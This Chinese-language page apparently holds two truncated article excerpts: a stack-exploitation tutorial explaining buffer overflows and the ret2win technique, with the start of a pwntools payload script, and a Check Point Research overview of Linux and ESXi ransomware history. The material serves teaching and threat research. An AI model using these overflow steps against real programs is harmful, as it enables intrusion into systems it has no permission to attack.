二进制代码利用是发现和利用计算机程序中的漏洞以修改或干扰其预期行为的一种方法。这些漏洞可能导致身份验证绕过和信息泄漏，或者还可能导致远程代码执行情形。很大一部分二进制代码利用发生在堆栈（stack）上，有时候发生在堆（heap）上，甚至发生在内核空间上。堆栈是存储由函数创建的临时变量的内存区域。相比之下，堆则是可以动态分配的内存区域。 下面介绍的所有技术都依赖用户输入和程序的潜在崩溃或分段错误——缓冲区溢出。当进程试图用超出预期的过多数据填充一块内存区域时，就会出现这种损坏。有鉴于此，就有可能覆盖内存，并控制下一个指令点/函数。 接下来，我们将描述堆栈利用过程中一些最常用的技术。 ret2win 我们可以将ret2win技术理解为对二进制代码中存在的特定调用«win() function»的简单重定向。实现这一目标的主要步骤如下： • 找到目标函数/调用，以重定向执行流«win() function»。 • 通过覆盖堆栈上的返回地址（比如EIP）来调用它。 下一段代码介绍如何找到这类漏洞。在添加填充和对齐载荷之后，必须添加目标调用«win() function - 0x080491c3»的偏移量，最后执行它。本文使用了用于二进制利用的CTF框架Pwntools（https://github.com/Gallopsled/pwntools），为学习过程提供便利。 from pwn import * p = process('./vuln_program') payload = b'A' * 52 …

Check Point Research (CPR)提供了一些最近针对Linux系统和ESXi系统的勒索软件攻击案例，不难发现，这些攻击在过去几年一直在增加。 2021年发布的Babuk源代码显然促进了大量勒索软件的出现，许多针对Linux大量使用OpenSSL库以及ChaCha20/RSA和AES/RSA的算法接连出现。 分析介绍 我们对一些顶级勒索软件家族(总共12个)进行了研究，发现这些勒索软件要么是直接为Linux系统开发的，要么是用具有强大跨平台组件的语言开发的，比如Golang或Rust，允许它们在Windows和Linux上不加区分地编译。 为了更好比较Linux和Windows开发的勒索软件，我们首先需要关注这两个系统的历史演变。 Linux勒索软件 Windows勒索软件 首先，我们注意到，第一个可查的勒索软件样本(尽管处于非常早期的阶段)可以追溯到1989年。这种被称为AIDS的威胁是通过软盘和目标Windows系统传播的。 直到2004年的GPCode，我们才开始看到第一批恶意软件。它们专注于Windows环境，很快勒索软件威胁开始进行演变，如2006年的Archiveus，或2012年作为第一个RaaS出现的Reveton。 到2015年，有了Linux.Encoder.1，这是专门针对Linux的勒索软件。此时，网络威胁已经在Windows系统中得到高度发展。尽管这些威胁在Windows中很成熟，但并不能直接转移到Linux上。 事实上，尽管在2015年已经有针对Linux的勒索软件，但相比来说，数量仍然非常…